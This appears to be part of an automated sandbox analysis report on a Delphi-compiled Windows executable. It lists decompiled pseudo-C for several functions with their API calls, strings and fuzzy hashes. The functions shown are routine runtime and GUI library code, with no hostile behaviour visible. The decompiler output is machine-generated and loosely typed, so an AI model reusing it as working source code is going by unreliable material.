			E00403454() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x47600c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x47600c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x47600c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004034C5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034cc);
					return RegCloseKey(_v8);
				}
			}

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 0040346C
FPUMaskValue, xrefs: 004034A0

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 3c11f0a672305b372e4dc847a6f18381d6739c74260647ea1639c62429796a73
Instruction ID: 3a8957fe435edeeffa09adf28aba9ffd9e61145ecfe252fb76a161489192219a
Opcode Fuzzy Hash: 3c11f0a672305b372e4dc847a6f18381d6739c74260647ea1639c62429796a73
Instruction Fuzzy Hash: 2201B575510308BAE711EF91CC42BA97BACD704B05F1045B6F908F65D0E6799A10CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00402924, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402924(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E004045B0(_t25, 0x105,  &_v532);
			}

0x0040292c
0x0040292e
0x00402932
0x0040293c
0x0040293f
0x00402944
0x00402956
0x0040295c
0x0040295c
0x0040296b
0x00402972
0x0040297c
0x0040297c
0x00402999

APIs

GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,004654E3), ref: 00402956
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,004654E3), ref: 0040295C
GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,004654E3), ref: 0040296B
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,004654E3), ref: 0040297C

Strings

:, xrefs: 0040293F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4b30bc702f1b8a1e79953e471d9f790ef3770be4b2b49636381e1e0539701b33
Instruction ID: 65af94f08173e3417ccc1a5c10f762e489d2bb018a98be52c56f19f3046a90dd
Opcode Fuzzy Hash: 4b30bc702f1b8a1e79953e471d9f790ef3770be4b2b49636381e1e0539701b33
Instruction Fuzzy Hash: 01F096622487805ED310E6788856BDB73DC9F55704F04846EBAC8E73C2F6B889449767

Uniqueness

Uniqueness Score: -1.00%

Function 004752D0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004752D0(void* __ecx) {
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t9;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t19;

				_push(_t19);
				_push(0x47533f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t19;
				 *0x492c8c =  *0x492c8c + 1;
				if( *0x492c8c == 0) {
					if( *0x492c90 != 0) {
						_t9 =  *0x492c90; // 0x0
						FreeLibrary(_t9);
					}
					if( *0x492c94 != 0) {
						_t7 =  *0x492c94; // 0x0
						FreeLibrary(_t7);
					}
					_t15 =  *0x467a48; // 0x467a4c
					E00404DF4(0x476cdc, _t15);
					_t16 =  *0x467a48; // 0x467a4c
					E00404DF4(0x476cd0, _t16);
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(0x475346);
				return 0;
			}

APIs

FreeLibrary.KERNEL32(00000000,00000000,0047533F), ref: 004752F8
FreeLibrary.KERNEL32(00000000,00000000,0047533F), ref: 0047530C

Strings

4zF, xrefs: 00475311
LzF, xrefs: 00475316, 00475326
4zF, xrefs: 00475321

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: 4zF$4zF$LzF
API String ID: 3664257935-4285706521
Opcode ID: be020a1cb752e0502703d83cae74974f5055b196fc92fa32e8b583eb58854530
Instruction ID: cd44a410726c406b2b7fe0c4b6c757368d4010149d2f70e764c97d7e8f028b1c
Opcode Fuzzy Hash: be020a1cb752e0502703d83cae74974f5055b196fc92fa32e8b583eb58854530
Instruction Fuzzy Hash: 9BF0B470204A40AFD725AF69ED016AA3369E354304B41C43BE808476B0DBFD5801DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0045BDB0, Relevance: 7.8, APIs: 5, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0045BDB0(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E0045F7B8( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E0045F798( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045B5E0( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045A314(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E00420600( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041FBEC( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E00420284(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45c0e4; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45c0e4);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45c0e4)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037D8( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041FBEC( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041F400( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45c0e0; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45c0dc);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e544722e1dd04e34dfc6d722b3ddc66385eea87416ddf4a68a1f8d1b7a1311f6
Instruction ID: c0180a7917cf77d7b63928f836e05d9b0d01cb765915a8b5c76311820d85f327
Opcode Fuzzy Hash: e544722e1dd04e34dfc6d722b3ddc66385eea87416ddf4a68a1f8d1b7a1311f6
Instruction Fuzzy Hash: 43B1F975A002589FCB10DF9CC489BEEB7F5AF09305F0480A6ED44AB3A6C778AC49CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0044E5EC, Relevance: 7.7, APIs: 5, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0044E5EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_v8 = __eax;
				E00438BE4(_v8);
				_push(_t203);
				_push(0x44e842);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x492709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00438354(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E00435590(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E004355D4(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x44e850; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E0044DB54(_v8, 1, 1);
						E0043BCF8(_v8, 1, 1, _t215);
					}
					E00436D28(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x44e849);
					return E00438BEC(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x492c08; // 0x221094c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x492c08; // 0x221094c
							E0041F5E8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F5E0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x492c08; // 0x221094c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E0044E974(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E0044DB54(_v8, _t122, _t199);
						E0043BCF8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E6AB
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E727
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E756
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E785
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7A8

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b397a4cf440d93dc7ae4467d2d86ec317741e6a73e626e2f5f43d2d9886ef40e
Instruction ID: 6960c3494087b3200d96737c44c3ee892bb725ce984e2307a56490d00ad7d24d
Opcode Fuzzy Hash: b397a4cf440d93dc7ae4467d2d86ec317741e6a73e626e2f5f43d2d9886ef40e
Instruction Fuzzy Hash: C271C734B04144EFDB00DBA9C589AA9B7F5BF49304F2541F6E408EB362DB35AE45DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0045DFCC, Relevance: 7.7, APIs: 5, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0045DFCC(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t109;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t142 = _a4;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(_v8 != 0) {
						_t29 = _t142 + 0x34; // 0xe89c933
						_t31 = _t142 + 0xc; // 0x895653ec
						E00412B80( *_t31, 0,  &_v28,  *_t29);
						ScrollWindowEx(E0043C1F4(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						_t37 = _t142 + 0x3c; // 0x55894233
						_t39 = _t142 + 4; // 0x55c35b5e
						_t40 = _t142 + 0x34; // 0xe89c933
						__eflags = 0;
						E00412B80( *_t39,  *_t40,  &_v28,  *_t37);
						ScrollWindowEx(E0043C1F4(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						_t44 = _t142 + 0x3c; // 0x55894233
						_t46 = _t142 + 0xc; // 0x895653ec
						_t47 = _t142 + 0x34; // 0xe89c933
						E00412B80( *_t46,  *_t47,  &_v28,  *_t44);
						_t90 = ScrollWindowEx(E0043C1F4(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						_t22 = _t142 + 0x3c; // 0x55894233
						_t24 = _t142 + 0xc; // 0x895653ec
						_t25 = _t142 + 0x34; // 0xe89c933
						E00412B80( *_t24,  *_t25,  &_v28,  *_t22);
						_t90 = ScrollWindowEx(E0043C1F4(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037D8(_t125, _t147) != 0) {
						_t11 = _t142 + 0x3c; // 0x55894233
						_push( *_t11);
						_push( &_v28);
						_t109 = E00435578(_t125);
						_t13 = _t142 + 4; // 0x55c35b5e
						_push(_t109 -  *_t13);
						E00435578(_t125);
						__eflags = 0;
						_pop(_t131);
						E00412B80(_t131, 0);
						_v8 =  ~_v8;
					} else {
						_t7 = _t142 + 0x3c; // 0x55894233
						_t9 = _t142 + 0xc; // 0x895653ec
						E00412B80( *_t9, 0,  &_v28,  *_t7);
					}
					_t90 = ScrollWindowEx(E0043C1F4(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E0045F7D8(_t125,  &_v44);
					return E0045D6C8(_t125,  &_v44, _t149);
				}
			}

APIs

ScrollWindowEx.USER32 ref: 0045E063
ScrollWindowEx.USER32 ref: 0045E0A3
ScrollWindowEx.USER32 ref: 0045E0E0
ScrollWindowEx.USER32 ref: 0045E115
ScrollWindowEx.USER32 ref: 0045E14D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ScrollWindow
String ID:
API String ID: 2126015319-0
Opcode ID: 17c667a3771b4c0538ed94ff692a567cebbbf67053029177f03cb584ba584c94
Instruction ID: fea2088d03b77c64c6fd9cee4769f1218f6eafd672669c05cb62bc988ca7fb8f
Opcode Fuzzy Hash: 17c667a3771b4c0538ed94ff692a567cebbbf67053029177f03cb584ba584c94
Instruction Fuzzy Hash: D7510072A00509BBDB00DE95CD82FDBB7ACAF08314F405526B605E7682CB74F955CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00445994, Relevance: 7.7, APIs: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00445994(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x445b78);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E004477F8(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E00448E34(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043E0( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404744(_v16, 0x445b9c);
					if(_t153 != 0) {
						E0041FD08( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041F6C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x445ba0;
							E0041F6CC( *((intOrPtr*)(_v8 + 0xc)), E0041F6C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x445ba0, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404600(_v16);
							_t65 = E004047F8(_v16);
							DrawTextA(E00420704(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x445b7f);
							return E00404348( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041F400( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E00404600(_v16);
								_t91 = E004047F8(_v16);
								DrawTextA(E00420704(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041F400( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041EF40(0x8000000d);
								_t78 = E0041EF40(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041F400( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00420704(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404608( &_v16, 0x445b90);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445A63
OffsetRect.USER32(?,00000001,00000001), ref: 00445AB4
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445AE9
OffsetRect.USER32(?,000000FF,000000FF), ref: 00445AF6
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B5D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
